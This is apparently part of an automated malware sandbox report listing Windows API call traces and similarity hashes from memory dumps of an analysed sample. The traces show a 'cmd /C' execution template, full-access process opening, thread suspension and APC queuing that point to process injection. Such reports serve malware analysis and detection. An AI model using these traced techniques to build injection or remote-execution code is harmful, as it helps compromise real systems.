    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
